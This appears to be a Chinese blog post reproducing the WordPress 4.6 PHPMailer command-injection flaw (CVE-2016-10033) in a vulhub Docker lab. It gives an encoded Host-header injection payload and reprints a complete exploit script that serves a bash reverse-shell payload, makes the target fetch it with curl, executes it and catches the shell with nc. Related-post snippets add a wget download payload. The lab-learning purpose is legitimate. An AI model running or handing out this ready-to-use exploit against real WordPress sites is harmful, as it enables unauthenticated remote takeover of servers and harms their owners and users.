Wordpress 4.6任意命令执行漏洞

最新推荐文章于 2022-12-31 09:03:46 发布
最新推荐文章于 2022-12-31 09:03:46 发布
阅读量862 收藏
点赞数
分类专栏: vulhub 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/122016231
版权

Wordpress 4.6 任意命令执行漏洞

1.漏洞环境

docker-compose up -d

运行后访问http://192.168.254.202:8080安装wordpress

在这里插入图片描述

账号我这里重新设置了一下,wordperss

2.漏洞复现

  • payload

    payload中run{}里面所有的/用${substr{0}{1}{$spool_directory}}代替

payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

构造payload
target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

在这里插入图片描述

这个user_login要填写存在的用户名,可以使用初始化用户名和密码admin,我这里手欠改成了wordperss,执行后可以到docker看一下结果

在这里插入图片描述

可以看到生成了success

  • 漏洞利用

    # POC 
#!/bin/bash
#
#      __                     __   __  __           __
#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
#            /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
#                        .;lc'
#                    .,cdkkOOOko;.
#                 .,lxxkkkkOOOO000Ol'
#             .':oxxxxxkkkkOOOO0000KK0x:'
#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
#             .':oxxxxxxxxx.ckkkkkkkkxl,.
#                 .,cdxxxxx.ckkkkkxc.
#                    .':odx.ckxl,.
#                        .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
 
 
 
rev_host="192.168.254.197"   //这里填写上攻击机的IP
 
function prep_host_header() {
      cmd="$1"
      rce_cmd="\${run{$cmd}}";
 
      # replace / with ${substr{0}{1}{$spool_directory}}
      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
 
      # replace ' ' (space) with
      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
      #return "target(any -froot@localhost -be $rce_cmd null)"
      host_header="target(any -froot@localhost -be $rce_cmd null)"
      return 0
}
 
 
#cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro"  | base64 -d
echo "$intro2" | base64 -d
 
if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo
 
 
if [ "$choice" == "y" ]; then
 
echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"
 
# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
 
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
 
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"
 
echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -nvv -l -p 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0
 
fi
 
 
echo "Exiting..."
exit 0

    执行wordpress.sh脚本./wordpress.sh 192.168.254.202:8080

在这里插入图片描述

参考链接:https://blog.csdn.net/xuandao_ahfengren/article/details/106716719

小白头发少
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wordpress 4.6 任意命令执行漏洞
锋刃科技的博客
06-12 4839
1、简介 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 2、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 3、环境搭建 我们这里使用vulhub和docker搭建环境 cd vulhub/wordpress/pwnscriptum docker-compose build docke
探索WordPress安全的无尽之旅:WP Exploits
最新发布
gitblog_00075的博客
06-23 323
探索WordPress安全的无尽之旅:WP Exploits 项目地址:https://gitcode.com/0xd3vil/WP-Vulnerabilities-Exploits 1、项目介绍 在Web开发的世界里,WordPress以其易用性和强大的功能成为了最受欢迎的内容管理系统之一。然而,随着其广泛使用,安全问题日益凸显。WP Exploits是一个独特的开源项目,它专注于收集和整理关于...
【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞
qq_45300786的博客
04-16 1064
访问地址:http://your-ip:8080/wp-login.php 这里我就简单说下需要特别注意的地方。 1、payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替 2、payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替 Payload,在tmp处添加success文件 aa(any -froot@localhost -be ${run{/bin/touch /tmp/success
wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
永远是少年
12-31 1478
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现。 一、wordpress 4.6任意命令执行漏洞(PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
WordPress v4.6 正式版
12-05
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
wordpress-4.6.zip简体中文版
08-31
WordPress 4.6简体中文版是WordPress开源内容管理系统的一个特定版本,专为中文用户设计。这个版本在2016年发布,带来了许多新功能、改进和优化,旨在提升用户体验和网站管理效率。以下是对WordPress 4.6中一些重要...
WordPress v4.6 RC2
12-05
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
WordPress v4.6 beta1
12-06
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
WordPress v4.6 beta2
12-06
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
WordPress扫描程序:WordPress漏洞扫描程序
02-05
介绍 用PHP编写的Wordpress扫描仪,侧重于漏洞评估和Wordpress安装中错误配置的安全审核。 Wordpress Scanner能够发现Wordpress安装中的缺陷,并将提供有关该漏洞的所有信息。 Wordpress Scanner不是用于代码审核的工具,它对Wordpress支持的Web应用程序执行“黑匣子”扫描。 基本安全检查将检查WordPress安装中是否存在常见的与安全相关的错误配置。 使用基本检查选项进行测试会使用常规的Web请求。 系统从目标站点下载少量页面,然后对生成的html源执行分析。 用法 Usage: php app.php [options] Opt
WordPress安全漏洞:从任意文件删除到任意代码执行
jisuyunzzc的博客
05-29 498
WordPress安全漏洞:从任意文件删除到任意代码执行 WordPress是网络上最受欢迎的CMS系统。据w3tech统计,约有30%的网站运行了该系统。该系统的应用是如此广泛,难免会成为网络犯罪分子攻击目标。在这篇博文中,我们将为读者介绍WordPress内核中的一个任意文件删除漏洞,这个漏洞可能会导致攻击者执行任意代码。早在7个月前,我们就向WordPress安全团队报告了这个漏洞,但到目前为止,该漏洞仍然没有得到修补。自初次报告(该报告既没有提供任何补丁,也没有给出具体的修复计划)至今,已经过了漫长
WordPress 4.6远程执行代码漏洞
菜鸟耿耿
10-08 1211
WordPress 4.6远程执行代码漏洞漏洞复现) 漏洞编码: CVE-2016-10033 漏洞简述: WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落。远程攻击者可以利用该漏洞执行代码。 漏洞版本: WordPress <= 4.6.0 PHPMailer < 5.2.18 漏洞原理: 主要是phpmailer组件调用linux系统命令sendmail进行邮件
php wordpress漏洞,WordPress 4.6无需认证远程命令执行漏洞分析
weixin_31069599的博客
03-25 779
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。根据w3techs.com对WordPress网站的实时市场份额统计,WordPress占所有使用内容管理系统的网站的58.9%。大约占所有网站的27.9%左右。WordPress 4.6 版本存在一个非常严重的远程代码执行漏洞,未经授权的攻...
WordPress 远程命令执行漏洞
weixin_47493074的博客
10-01 498
WordPress 远程命令执行漏洞
Wordpress内容注入漏洞致超67000个网站遭黑产利用
weixin_33913377的博客
08-01 590
如果你的网站使用的是WordPress,并且没有及时更新官方上周发布的补丁,升级到v4.7.2版本,那么你的网站很有可能受到这4个黑客组织的攻击。 据国外Web安全公司Sucuri表示,自上周一该漏洞细节公开后,攻击范围不断扩大,最近每天趋于3000次。 随着时间的推移利用REST API漏洞尝试次数(来源:Sucuri) 攻击者正在利用WordPre...
【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞(CVE-2016-10033)
weixin_42884199的博客
12-06 379
一、启动靶机 docker-compose build docker-compose up -d 访问URL进行install: http://192.168.150.146:8080 二、生成payload 前提:命令中 空格 用 ${substr{10}{1}{$tod_log}}代替 / 用 ${substr{0}{1}{$spool_directory}}代替 命令: /usr/bin/wget --output-document /tmp/rce vps_ip/a.txt payload:
WordPress<=4.6 RCE(CVE-2016-10033)
jammny
10-24 602
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
wordpress漏洞
07-28
回答: WordPress存在一些安全漏洞,其中包括SQL注入漏洞和远程代码注入漏洞。SQL注入漏洞是由于clean_query函数的校验不当导致的,可能通过插件或主题触发。这个漏洞已经在WordPress5.8.3中修复,影响的版本可以追溯...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值